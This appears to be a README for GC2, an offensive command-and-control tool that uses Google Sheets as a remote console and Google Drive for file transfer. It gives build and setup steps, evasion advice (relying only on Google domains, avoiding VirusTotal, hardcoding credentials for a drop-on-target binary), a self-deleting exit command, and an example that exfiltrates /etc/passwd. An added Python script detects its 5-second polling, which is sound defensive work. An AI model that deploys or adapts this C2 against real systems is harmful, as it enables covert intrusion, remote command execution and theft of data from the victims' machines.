


GC2 (Google Command and Control) is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and to exfiltrate data using Google Drive.

Why

This program was developed to provide a command and control channel that does not require any particular setup (such as a custom domain, VPS, CDN, …) during Red Teaming activities.

Furthermore, the program interacts only with Google's domains (*.google.com) to make detection more difficult.

PS: Please don't upload the compiled binary to VirusTotal 🙂

Set up

  1. Build the executable

    git clone https://github.com/looCiprian/GC2-sheet
    cd GC2-sheet
    go build gc2-sheet.go
  2. Create a new Google “service account”

    Create a new Google “service account” using https://console.cloud.google.com/, then create a .json key file for the service account

  3. Enable Google Sheet API and Google Drive API

    Enable Google Drive API https://developers.google.com/drive/api/v3/enable-drive-api and Google Sheet API https://developers.google.com/sheets/api/quickstart/go

  4. Set up Google Sheet and Google Drive

    Create a new Google Sheet and add the service account to the editor group of the spreadsheet (to add the service account, use its email)

    Create a new Google Drive folder and add the service account to the editor group of the folder (to add the service account, use its email)

  5. Start the C2

    gc2-sheet --key <GCP service account credential file .json> --sheet <Google sheet ID> --drive <Google drive ID>

    PS: you can also hardcode the parameters in the code, so that only the executable needs to be uploaded to the target machine (check the comments in root.go and authentication.go)

Features

  • Command execution using Google Sheet as a console
  • Download files to the target using Google Drive
  • Data exfiltration using Google Drive
  • Exit

Command execution

The program sends a request to the spreadsheet every 5 sec to check whether there are new commands.
Commands must be inserted in column “A”, and the output will be printed in column “B”.
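
From the defender's side, the fixed 5-second poll described above is the observable trait: a non-browser process contacting the Sheets API at a near-constant interval. The following is an added example, not part of GC2 or of the original page, that flags such periodic polling in proxy logs; the log format, the host and process names, and the `sheets.googleapis.com` destination in the sample data are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev


def constructed_sample():
    """Constructed proxy log: '<timestamp> <host> <process> <destination>' per line."""
    base = datetime(2024, 1, 1, 10, 0, 0)
    lines = []
    # Steady ~5 s poll from a non-browser process (all names hypothetical).
    for i in range(12):
        ts = base + timedelta(seconds=5 * i + 0.2 * (i % 2))
        lines.append(f"{ts.isoformat()} ws-017 updater.exe sheets.googleapis.com")
    # A person working in a spreadsheet: bursty, irregular requests.
    for off in (0, 3, 41, 44, 120, 300, 302):
        ts = base + timedelta(seconds=off)
        lines.append(f"{ts.isoformat()} ws-022 chrome.exe sheets.googleapis.com")
    lines.append("malformed line")
    return "\n".join(lines)


def find_beacons(log_text, period=5.0, tolerance=1.0, max_jitter=0.5, min_events=6):
    """Return sorted (host, process, destination) keys polling at ~`period` seconds."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip lines that do not match the assumed format
        ts, host, proc, dest = parts
        events[(host, proc, dest)].append(datetime.fromisoformat(ts))
    hits = []
    for key, times in events.items():
        if len(times) < min_events:
            continue  # too few requests to judge regularity
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # Beacon-like: mean gap near the poll period and very little spread.
        if abs(mean(gaps) - period) <= tolerance and pstdev(gaps) <= max_jitter:
            hits.append(key)
    return sorted(hits)


if __name__ == "__main__":
    for host, proc, dest in find_beacons(constructed_sample()):
        print(f"periodic polling: {host} {proc} -> {dest}")
```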

Data exfiltration file

Special commands are reserved to perform uploads from and downloads to the target machine

From Target to Google Drive
upload;<remote path>
Example:
upload;/etc/passwd

Download file

Special commands are reserved to perform uploads from and downloads to the target machine

From Google Drive to Target
download;<google drive file id>;<remote path>
Example:
download;<file ID>;/home/user/downloaded.txt

Exit

By sending the command exit, the program will delete itself from the target and kill its process

PS: From os documentation:
If a symlink was used to start the process, depending on the operating system, the result might be the symlink or the path it pointed to. In this case the symlink is deleted.
